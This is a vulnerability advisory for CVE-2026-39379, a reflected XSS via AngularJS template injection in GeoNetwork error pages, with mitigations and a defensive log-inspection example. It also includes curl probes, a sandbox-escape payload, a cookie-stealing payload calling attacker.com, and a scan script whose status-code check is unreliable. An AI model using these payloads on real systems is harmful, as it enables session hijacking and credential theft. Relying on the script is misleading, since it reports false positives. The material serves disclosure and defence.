GeoNetwork, Reflected XSS via Client-Side Template Injection (CVE-2026-39379) – High Severity -DC-Jul2026-791


How CVE-2026-39379 Works

GeoNetwork is an open-source catalog application for managing spatially referenced resources. It uses AngularJS for its frontend, including its error pages. When a user requests a URL that does not exist or that they are not authorized to access, the application displays an error page. This error page reflects part of the original request back to the user without proper sanitization.
Because the error page is itself an AngularJS application, any user-supplied content that is reflected into it is interpreted as an AngularJS template expression if it is enclosed in the interpolation delimiters (`{{` and `}}`). AngularJS evaluates these expressions in the context of the page's scope, which allows an attacker to execute arbitrary JavaScript.
The AngularJS sandbox is designed to prevent arbitrary code execution, but known sandbox-escape techniques exist. By combining the reflected template injection with a sandbox escape payload, an attacker can bypass the sandbox and execute arbitrary JavaScript in the victim’s browser. This is a reflected Cross-Site Scripting (XSS) vulnerability, as the malicious payload is reflected off the server and executed immediately when the victim visits the crafted URL.
The attack vector is simple: an attacker crafts a malicious URL containing the AngularJS template expression payload. They then trick a victim (including an administrator) into clicking the link. When the victim’s browser requests the URL, GeoNetwork returns an error page that includes the payload as part of the reflected content. The browser then renders the page, and AngularJS evaluates the expression, executing the attacker’s JavaScript.
This vulnerability affects all GeoNetwork versions from 3.0.0 through 3.12.12, 4.0.0-alpha.1 through 4.0.6, 4.2.0 through 4.2.14, and 4.4.0 through 4.4.9. The issue is fixed in versions 4.2.15 and 4.4.10. Older 3.x and 4.0.x branches are archived and will not receive patches.

DailyCVE Form

Platform: GeoNetwork
Version: 3.0.0–4.4.9
Vulnerability: Reflected XSS (Template Injection)
Severity: High (CVSS 7.5)
Date: 2026-07-01

Prediction: Patch expected 2026-07-01

What Undercode Say (Analytics)

The following bash commands and code snippets can be used to test for the presence of this vulnerability and to understand its exploitation.

1. Basic Payload Test

To check if a GeoNetwork instance is vulnerable, an attacker can craft a URL that includes a simple AngularJS expression, such as `{{7*7}}`. If the application is vulnerable, the error page will display `49` instead of the literal string.

curl -sg "https://target-geonetwork.com/geonetwork/srv/eng/nonexistent?service={{7*7}}" | grep -o "49"

(`-g` disables curl's `{}` URL globbing so the braces are sent literally rather than rejected as a bad glob range.)

2. Sandbox Escape Payload

A more advanced payload can be used to execute arbitrary JavaScript. The following example uses a known AngularJS sandbox escape to trigger an alert dialog:

curl -sg "https://target-geonetwork.com/geonetwork/srv/eng/nonexistent?service={{constructor.constructor('alert(1)')()}}"

3. Automated Detection Script

A simple bash script can be used to scan for the vulnerability across multiple endpoints:

#!/bin/bash
# Usage: ./check.sh https://target-geonetwork.com/geonetwork
TARGET="${1:?usage: $0 <geonetwork-base-url>}"
PAYLOAD="{{constructor.constructor('alert(document.domain)')()}}"
# -g disables curl's {} URL globbing so the braces reach the server literally;
# the status code alone does not confirm that the payload was reflected.
RESPONSE=$(curl -sg -o /dev/null -w "%{http_code}" "${TARGET}/srv/eng/nonexistent?service=${PAYLOAD}")
if [ "$RESPONSE" -eq 200 ]; then
  echo "Vulnerable: ${TARGET}"
else
  echo "Not vulnerable or unreachable: ${TARGET}"
fi

4. Exfiltration Payload

An attacker can use the vulnerability to exfiltrate sensitive data, such as session cookies, to an external server:

{{constructor.constructor('fetch("https://attacker.com/steal?cookie="+document.cookie)')()}}

When URL-encoded, this payload can be inserted into the `service` parameter of a GeoNetwork URL.

Exploit

An attacker can exploit this vulnerability by crafting a malicious URL and distributing it via phishing emails, social media, or other channels. When a victim clicks the link, the following occurs:
1. The victim’s browser sends a request to the GeoNetwork server with the malicious payload in the URL.
2. The server, unable to find the requested resource or lacking authorization, returns an error page.
3. The error page reflects the payload without sanitization.
4. The victim’s browser renders the page, and AngularJS evaluates the payload as a template expression.
5. The payload executes arbitrary JavaScript in the context of the victim’s authenticated session.
For example, an attacker could inject a fake login form that looks identical to the legitimate GeoNetwork login page. When the victim enters their credentials, the form submits them to the attacker’s server. Alternatively, the attacker could perform actions on behalf of the victim, such as modifying metadata records or exfiltrating sensitive information.

Protection

To protect against CVE-2026-39379, the following measures are recommended:
1. Upgrade to a patched version: The most effective protection is to upgrade to GeoNetwork 4.2.15 or later, or 4.4.10 or later. These versions include fixes that properly sanitize user input reflected in error pages.
2. Apply a Web Application Firewall (WAF): If an immediate upgrade is not possible, a WAF can be configured to block requests containing known AngularJS template injection patterns (e.g., the `{{` and `}}` delimiters, including their percent-encoded forms). This can provide temporary protection until the upgrade can be performed.
3. Input Validation and Output Encoding: Developers should ensure that all user-supplied input is properly validated and that output is encoded based on the context in which it is rendered. In the case of AngularJS applications, special care must be taken to sanitize any content that is reflected into templates.
4. Content Security Policy (CSP): Implementing a strict CSP can help mitigate the impact of XSS vulnerabilities by restricting the sources from which scripts can be loaded and executed. However, CSP may not fully prevent this specific vulnerability if the payload is inline.
5. Disable AngularJS Template Expressions in Error Pages: If the codebase can be modified, consider disabling AngularJS template evaluation in error pages or using a different templating engine that does not evaluate expressions.
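The WAF pattern in item 2 and the output handling in items 3 and 5 can be made concrete. The following Node.js example is added here and is not GeoNetwork's or DailyCVE's own code: it percent-decodes a request target (bounded, so a double-encoded `%257B%257B` is also seen as `{{`), flags AngularJS interpolation markers across a few constructed access-log lines, and shows a server-side helper that wraps an entity-escaped value in `ng-non-bindable`, because the browser decodes entities back to `{{` in the text node before AngularJS scans it, so escaping alone does not stop interpolation. The function names, regexes and log lines are assumptions constructed for this example.

```javascript
// Added example (not GeoNetwork or DailyCVE code): request-side detection of
// AngularJS template-injection markers and a safe way to reflect a request
// value into an AngularJS-compiled error page. Node.js, no dependencies.
// All names, patterns and sample data below are constructed for this example.

// Percent-decode repeatedly (bounded) so that %7B%7B and the double-encoded
// %257B%257B both canonicalize to "{{". A malformed escape stops decoding and
// the last well-formed value is kept, so bad input cannot crash the inspector.
function canonicalize(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch (e) {
      break;
    }
    if (decoded === current) break;
    current = decoded;
  }
  return current;
}

// Markers that indicate an AngularJS expression is being smuggled in a request.
// The interpolation delimiters alone are enough to flag; the constructor chain
// is the escape primitive used by the payloads quoted on this page.
const TEMPLATE_MARKERS = [
  { name: 'interpolation-delimiters', re: /\{\{[\s\S]*?\}\}/ },
  { name: 'constructor-chain', re: /\bconstructor\s*\.\s*constructor\b/ },
];

// Inspect one request target (path + query) and report which markers matched.
function inspectRequestTarget(target) {
  const canonical = canonicalize(target);
  const markers = TEMPLATE_MARKERS.filter((m) => m.re.test(canonical)).map((m) => m.name);
  return { target, canonical, suspicious: markers.length > 0, markers };
}

// Constructed combined-log-style lines: one benign request, one single-encoded
// probe, one double-encoded constructor chain, one benign single-brace value.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jul/2026:10:00:01 +0000] "GET /geonetwork/srv/eng/catalog.search HTTP/1.1" 200 5120',
  '10.0.0.9 - - [01/Jul/2026:10:00:07 +0000] "GET /geonetwork/srv/eng/nonexistent?service=%7B%7B7*7%7D%7D HTTP/1.1" 404 1873',
  '10.0.0.9 - - [01/Jul/2026:10:00:12 +0000] "GET /geonetwork/srv/eng/nonexistent?service=%257B%257Bconstructor.constructor%2528%2527x%2527%2529%2528%2529%257D%257D HTTP/1.1" 404 1901',
  '10.0.0.12 - - [01/Jul/2026:10:00:20 +0000] "GET /geonetwork/srv/eng/main.home?uuid=%7Babc%7D HTTP/1.1" 200 4200',
];

// Pulls the request target out of a combined-log request line.
const REQUEST_LINE = /"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS)\s+(\S+)\s+HTTP\/[\d.]+"/;

// Run the inspector over log lines and keep only the suspicious ones.
function flagLogLines(lines) {
  const findings = [];
  for (const line of lines) {
    const m = REQUEST_LINE.exec(line);
    if (!m) continue;
    const result = inspectRequestTarget(m[1]);
    if (result.suspicious) {
      findings.push({ line, canonical: result.canonical, markers: result.markers });
    }
  }
  return findings;
}

// Server-side rendering of a value that must appear inside an AngularJS-compiled
// page. Entity-escaping alone is not sufficient: the browser turns &#123;&#123;
// back into "{{" in the text node before AngularJS looks for interpolation.
// ng-non-bindable (a standard AngularJS directive) makes AngularJS skip the
// subtree, so the escaped value is displayed literally and never evaluated.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderReflectedValue(value) {
  return `<span ng-non-bindable>${escapeHtml(value)}</span>`;
}

console.log(JSON.stringify(flagLogLines(SAMPLE_LOG), null, 2));
console.log(renderReflectedValue('{{7*7}}<b>x</b>'));
```

Running it flags the two probe lines (the second with both markers, since the double-encoded target decodes to the constructor chain) and leaves the `{abc}` request alone; the rendering helper is the shape a server-side fix for item 5 takes when the reflected value must stay on an AngularJS page rather than being removed from it.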

Impact

The impact of this vulnerability is severe, as it allows an attacker to execute arbitrary JavaScript in the context of a victim’s authenticated session. This can lead to:
Session Hijacking: The attacker can steal the victim’s session cookies and impersonate them, gaining unauthorized access to the GeoNetwork instance.
Data Exfiltration: Sensitive information, such as metadata records, user credentials, or configuration details, can be exfiltrated to the attacker’s server.
Credential Theft: As mentioned, an attacker can inject a fake login form to harvest user credentials.
Privilege Escalation: If an administrator is tricked into clicking the link, the attacker can perform administrative actions, potentially compromising the entire GeoNetwork instance.
Defacement: The attacker could modify the appearance of the GeoNetwork interface, damaging the organization’s reputation.
Given that GeoNetwork 3.x and 4.0.x are archived and will not receive patches, instances running these versions are particularly at risk and should be upgraded to a supported release as soon as possible.


Sources:

Reported By: github.com